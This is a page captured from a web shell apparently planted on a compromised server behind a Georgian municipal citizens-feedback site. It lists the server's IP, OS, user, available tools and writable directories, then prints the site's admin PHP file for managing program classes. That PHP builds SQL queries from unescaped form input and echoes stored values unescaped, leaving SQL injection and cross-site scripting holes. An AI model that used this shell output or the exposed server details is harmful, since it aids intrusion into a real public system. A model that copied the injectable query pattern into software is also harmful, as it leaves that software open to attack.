403Webshell
Server IP : 80.241.246.6  /  Your IP : 216.73.216.188
Web Server : Apache/2.4.25 (Debian)
System : Linux kharagauli 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User : www-data ( 33)
PHP Version : 7.0.33-0+deb9u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/kharagauli_new/Citizens_feedback/admin/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/kharagauli_new/Citizens_feedback/admin/pages/programs.php
<div class="page-container" id="page-container"> 
    <!-- BEGIN MAIN CONTENT -->
    <div class="main_content">
        <!-- BEGIN WRAPPER -->
        <div class="content-wrapper" style="padding-top: 80px; padding-bottom: 80px">
<?php
if($_SESSION['E_'.$Action]==1)
if($Action=='programs'){ // ==================== Options RequestTimeInterval
	
	


if(isset($_GET['DelProgClass'])){
	$PCID=(int)$_GET['DelProgClass'];
	mysqli_query($baza,'delete from cf_ProgramClasses where ID='.$PCID);
	mysqli_query($baza,'delete from cf_Programs where ClassID='.$PCID);
	mysqli_query($baza,'delete from cf_Answers where ClassID='.$PCID);
	}
	
if(isset($_POST['ClassName'])){
	$ClassName=$_POST['ClassName'];
	$ClassID=(int)$_POST['ClassID'];
	if(isset($_POST['ShowInProgramList'])) $ShowInProgramList=1; else $ShowInProgramList=0;
	if(isset($_POST['CheckPersonalID'])) $CheckPersonalID=1; else $CheckPersonalID=0;
	if(isset($_POST['ShowOnlyUsedPrograms'])) $ShowOnlyUsedPrograms=1; else $ShowOnlyUsedPrograms=0;
	if($ClassID==0){
		$sql='select * from cf_ProgramClasses  where Name="'.$ClassName.'"';
		$ptk=mysqli_query($baza,$sql);
		if(mysqli_num_rows($ptk)>0) {
			info('ასეთი კლასი უკვე არსებობს'); 
			}else{
			$sql='insert into cf_ProgramClasses (Name,ShowInProgramList, CheckPersonalID, ShowOnlyUsedPrograms) values ("'.$ClassName.'", "'.$ShowInProgramList.'" , "'.$CheckPersonalID.'" , "'.$ShowOnlyUsedPrograms.'" )';
			$ptk=mysqli_query($baza,$sql);
			}
		}else{ // ClassID>0
		$sql='update cf_ProgramClasses set Name="'.$ClassName.'", ShowInProgramList="'.$ShowInProgramList.'" ,  ShowOnlyUsedPrograms="'.$ShowOnlyUsedPrograms.'", CheckPersonalID="'.$CheckPersonalID.'" where ID='.$ClassID;
		// echo $sql;
		$ptk=mysqli_query($baza,$sql);
		}
	if(!$ptk) die(mysqli_error($ptk));
	}
	
$ClassID=0; $ClassName=''; $ShowInProgramList=$CheckPersonalID=1; $ShowOnlyUsedPrograms=0;
if(isset($_GET['ID']))
	$ClassID=(int)$_GET['ID'];
	?>
<div class="inlineDiv">
	<table border="1" cellspacing="0" cellpadding="5" class="normal PCTable" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td colspan="2">კლასის დასახელება</td><td colspan="10"></td></thead>
		<tbody class="sortable">
	<?php
	$ptk=mysqli_query($baza,'select * from cf_ProgramClasses order by Pos');
	while($row=mysqli_fetch_array($ptk,1)){
		if($ClassID==$row['ID']) {
			$ClassName=$row['Name'];
			$ShowInProgramList=$row['ShowInProgramList'];
			$CheckPersonalID=$row['CheckPersonalID'];
			$ShowOnlyUsedPrograms=$row['ShowOnlyUsedPrograms'];
			}
	?>
		<tr num="<?=$row['ID']?>" <?=$row['ID']==$ClassID?'class="selected"':''?>>
			<td class="handle"></td>
			<td class="SelectedTD2"><?=$row['Name']?></td> 
			<td><span class="delete"></span></td>
			<td><span class="activeIcon <?=$row['Active']?'active':''?>"></span></td>
			<td><span class="ShowInProgramListIcon <?=$row['ShowInProgramList']?'active':''?>"></span></td>
			<td><span class="CheckPersonalIDIcon <?=$row['CheckPersonalID']?'active':''?>"></span></td>
			<td><span class="ShowOnlyUsedProgramsIcon <?=$row['ShowOnlyUsedPrograms']?'active':''?>"></span></td>
			<td><span class="archiveIcon <?=$row['Archive']?'active':''?>"></span></td>
		</tr>
		<?php } ?>
		</tbody>
	</table>
<script>
$('.PCTable .sortable').sortable({
	handle:'.handle',
	stop:function(){
		var tbody=$(this).closest('tbody');
		var lines=$(tbody).children('tr');
		var ss=[];
		$.each(lines,function(i,e){
			var num=$(e).attr('num');
			ss.push(num);
		})
		console.log(ss);
		$.ajax({
			url:'interactive.php',
			type:'post',
			dataType:'json',
			data:{f:'setClassesSort',ss:ss}
		})
		.done(function(data){
				console.log('DONE ',data);
		})
		.fail(function(data){
				console.log('FAIL ',data);
		})
		console.log('Stop');
		}
	})
$('.PCTable span.activeIcon').on('click',function(){ 
	$(this).toggleClass('active');
	var num=$(this).closest('tr').attr('num');
	var active=0;
	if($(this).hasClass('active')) active=1;
	$.ajax({
		url:'interactive.php',
		type:'post',
		dataType:'json',
		data:{f:'setClassesActive',num:num, active:active}
		})
	.done(function(data){console.log('done=',data)})
	.fail(function(data){console.log('fail=',data)})
	})
	
$('.PCTable span.archiveIcon').on('click',function(){ 
	$(this).toggleClass('active');
	var num=$(this).closest('tr').attr('num');
	var active=0;
	if($(this).hasClass('active')) active=1;
	$.ajax({
		url:'interactive.php',
		type:'post',
		dataType:'json',
		data:{f:'setArchiveActive',num:num, active:active}
		})
	.done(function(data){console.log('done=',data)})
	.fail(function(data){console.log('fail=',data)})
	})	
$('.PCTable span.delete').on('click',function(){ 
	var num=$(this).closest('tr').attr('num');
	confirmMessage('პროგრამის კლასის და მასში შემავალი ყველა პროექტის და მათი სტატისტიკის წაშლა','?Action=<?=$Action?>&DelProgClass='+num);
	})
</script>

	<form action="?Action=<?=$Action?>" method="post" enctype="multipart/form-data"><input type="hidden" name="ClassID" value="<?=$ClassID?>">
		<table border="1" cellspacing="0" cellpadding="5" class="normal" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td><?=$ClassID>0?'კლასის რედაქტირება <a href="?Action='.$Action.'">ახალი კლასი</a>':'ახალი კლასი'?></td></thead>
		<tr><td><input type="text" name="ClassName" value="<?=$ClassName?>"></td></tr>
		<tr><td><label ><input type="checkbox" name="ShowInProgramList" <?=$ShowInProgramList==1?'checked':''?>> - გამოჩნდეს პროგრამების სიაში</label></td></tr>
		<tr><td><label ><input type="checkbox" name="CheckPersonalID" <?=$CheckPersonalID==1?'checked':''?>> - შემოწმდეს პირადი ნომერი</label></td></tr>
		<tr><td><label ><input type="checkbox" name="ShowOnlyUsedPrograms" <?=$ShowOnlyUsedPrograms==1?'checked':''?>> - გამოჩნდეს მხოლოდ გამოყენებული პროგრამები</label></td></tr>
		<tr><td align="center" colspan="10"><input type="submit"></td>
		</table>
	</form>
</div>
	
	
	
	
<?php
if(isset($_GET['DelProgram'])){
	$PrID=(int)$_GET['DelProgram'];
	mysqli_query($baza,'delete from cf_Programs where ID='.$PrID);
	mysqli_query($baza,'delete from cf_Answers where ProgramID='.$PrID);
	}
	
if(isset($_POST['ProgramID'])){
	$ProgramID=(int)$_POST['ProgramID'];
	$ProgramName=$_POST['ProgramName'];
	$ProgramCode=$_POST['ProgramCode'];
	$ProgramBudjet=(int)$_POST['ProgramBudjet'];
	$ProgramDescription=$_POST['ProgramDescription'];
	$ProgramImplementingService=$_POST['ProgramImplementingService'];
	$ProgramExpectedResult=$_POST['ProgramExpectedResult'];
	$ProgramQuestionnaire=$_POST['ProgramQuestionnaire'];

	$ClassID=(int)$_POST['ClassID'];
	if($ProgramID==0){
		$sql='select * from cf_Programs where ClassID='.$ClassID.' and Name="'.$ProgramName.'"';
		$ptk=mysqli_query($baza,$sql);
		if(mysqli_num_rows($ptk)>0) {
			info('ასეთი პროგრამა უკვე არსებობს'); 
			}else{
			$sql='insert into cf_Programs (Name,ClassID, Code, Budjet, Description, ImplementingService, ExpectedResult, QuestionnaireID) 
			values ("'.$ProgramName.'", "'.$ClassID.'", "'.$ProgramCode.'", "'.$ProgramBudjet.'", "'.$ProgramDescription.'", "'.$ProgramImplementingService.'", "'.$ProgramExpectedResult.'", "'.$ProgramQuestionnaire.'")';
			$ptk=mysqli_query($baza,$sql);
			}
		}else{ // ClassID>0
		$sql='update cf_Programs set Name="'.$ProgramName.'", ClassID="'.$ClassID.'", Code="'.$ProgramCode.'", Budjet="'.$ProgramBudjet.'", Description="'.$ProgramDescription.'", ImplementingService="'.$ProgramImplementingService.'", ExpectedResult="'.$ProgramExpectedResult.'", QuestionnaireID="'.$ProgramQuestionnaire.'" where ID='.$ProgramID;
		$ptk=mysqli_query($baza,$sql);
		}
	if(!$ptk) die(mysqli_error($ptk).'<br>'.$sql);
	}
	

		
	$ProgramID=0;
	$ProgramName='';
	$ProgramCode='';
	$ProgramBudjet='';
	$ProgramDescription='';
	$ProgramImplementingService='';
	$ProgramExpectedResult='';
	$ProgramQuestionnaire='';
	
if(isset($_GET['PrID'])){
	$PrID=(int)$_GET['PrID'];
	$ptk=mysqli_query($baza,'select * from cf_Programs where ClassID='.$ClassID.' and ID='.$PrID);
	if($row=mysqli_fetch_array($ptk,1)){
		$ProgramID=$row['ID'];
		$ProgramName=$row['Name'];
		$ProgramCode=$row['Code'];
		$ProgramBudjet=$row['Budjet'];
		$ProgramDescription=$row['Description'];
		$ProgramImplementingService=$row['ImplementingService'];
		$ProgramExpectedResult=$row['ExpectedResult'];
		$ProgramQuestionnaire=$row['QuestionnaireID'];
		}
	}
	
?>
<div class="inlineDiv">
	<table border="1" cellspacing="0" cellpadding="5" class="normal PrTable" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td></td><td>კოდი</td><td colspan="2">პროგრამის დასახელება</td><td colspan="10"></td></thead>
		<tbody class="sortable">
	<?php
	$ptk=mysqli_query($baza,'select * from cf_Programs where ClassID='.$ClassID.' order by Pos');
	while($row=mysqli_fetch_array($ptk,1)){
			if($ProgramID==$row['ID']) {
				$ProgramName=$row['Name'];
				$ProgramCode=$row['Code'];
				$ProgramBudjet=$row['Budjet'];
				$ProgramDescription=$row['Description'];
				$ProgramImplementingService=$row['ImplementingService'];
				$ProgramExpectedResult=$row['ExpectedResult'];
				$ProgramQuestionnaire=$row['QuestionnaireID'];
				}
			?>
		<tr num="<?=$row['ID']?>" <?=$row['ID']==$ProgramID?'class="selected"':''?>>
			<td class="handle<?=$row['QuestionnaireID']>0?' hasQuestionaire':''?>"></td>
			<td class="Code"><?=$row['Code']?></td>
			<td class="SelectedTD2" href="ID=<?=$ClassID?>&PrID=<?=$row['ID']?>"><?=$row['Name']?></td>
			<td><span class="delete"></span></td>
			<td><span class="activeIcon <?=$row['Active']?'active':''?>"></span></td>
		</tr>
		<?php } ?>
		</tbody>
	</table>
<style>
	.Code{white-space: nowrap;}
</style>
<script>
$('.PrTable .sortable').sortable({
	handle:'.handle',
	stop:function(){
		var tbody=$(this).closest('tbody');
		var lines=$(tbody).children('tr');
		var ss=[];
		$.each(lines,function(i,e){
			var num=$(e).attr('num');
			ss.push(num);
		})
		console.log(ss);
		$.ajax({
			url:'interactive.php',
			type:'post',
			dataType:'json',
			data:{f:'setProgramSort',ss:ss}
		})
		.done(function(data){
				console.log('DONE ',data);
		})
		.fail(function(data){
				console.log('FAIL ',data);
		})
		console.log('Stop');
		}
	})
$('.PrTable span.activeIcon').on('click',function(){ 
	$(this).toggleClass('active');
	var num=$(this).closest('tr').attr('num');
	var active=0;
	if($(this).hasClass('active')) active=1;
	$.ajax({
		url:'interactive.php',
		type:'post',
		dataType:'json',
		data:{f:'setProgramActive',num:num, active:active}
		})
	.done(function(data){console.log('done=',data)})
	.fail(function(data){console.log('fail=',data)})
	})
$('.PrTable span.delete').on('click',function(){ 
	var num=$(this).closest('tr').attr('num');
	confirmMessage('პროგრამის და მასში შემავალი სტატისტიკის წაშლა','?Action=<?=$Action?>&DelProgram='+num);
	})
</script>
<?php
		if($ClassID>0){
		?>
	<form action="?Action=<?=$Action?>" method="post" enctype="multipart/form-data" class="PrForm">
		<input type="hidden" name="ProgramID" value="<?=$ProgramID?>">
		<input type="hidden" name="ClassID" value="<?=$ClassID?>">
		<table border="1" cellspacing="0" cellpadding="5" class="normal" align="center" style="border-collapse:collapse; margin-top:20px">
		<thead><tr><td><?=$ProgramID>0?'პროგრამის რედაქტირება <a href="?Action='.$Action.'&ID='.$ClassID.'">ახალი პროგრამა</a>':'ახალი პროგრამა'?></td></thead>
		<tr><td>დასახელება<br><input type="text" name="ProgramName" value="<?=$ProgramName?>"></td></tr>
			<tr><td>კოდი<br><input type="text" name="ProgramCode" value="<?=$ProgramCode?>"></td></tr>
			<tr><td>დაფინანსება (₾)<br><input type="text" name="ProgramBudjet" value="<?=$ProgramBudjet?>"></td></tr>
			<tr><td>აღწერა<br><textarea name="ProgramDescription" ><?=$ProgramDescription?></textarea></td></tr>
			<tr><td>განმახორციელებელი სამსახური<br><input type="text" name="ProgramImplementingService" value="<?=$ProgramImplementingService?>"></td></tr>
			<tr><td>მოსალოდნელი  შედეგი<br><input type="text" name="ProgramExpectedResult" value="<?=$ProgramExpectedResult?>"></td></tr>
			<tr><td>კითხვარი<br>
				<select name="ProgramQuestionnaire">
					<option value="0">-</option>
					<?php
			$ptk=mysqli_query($baza,'select * from cf_Questionnaire order by Name');
			while($row=mysqli_fetch_array($ptk,1))
				echo '<option value="'.$row['ID'].'" '.($row['ID']==$ProgramQuestionnaire?'selected':'').'>'.$row['Name'].'</option>';
			?>
				</select>
				</td></tr>
		<tr><td align="center" colspan="10"><input type="submit"></td>
		</table>
	</form>
		<?php } ?>
</div>		
			
	<?php  } ?>
</div> 	</div> 	</div>

Youez - 2016 - github.com/yon3zu
LinuXploit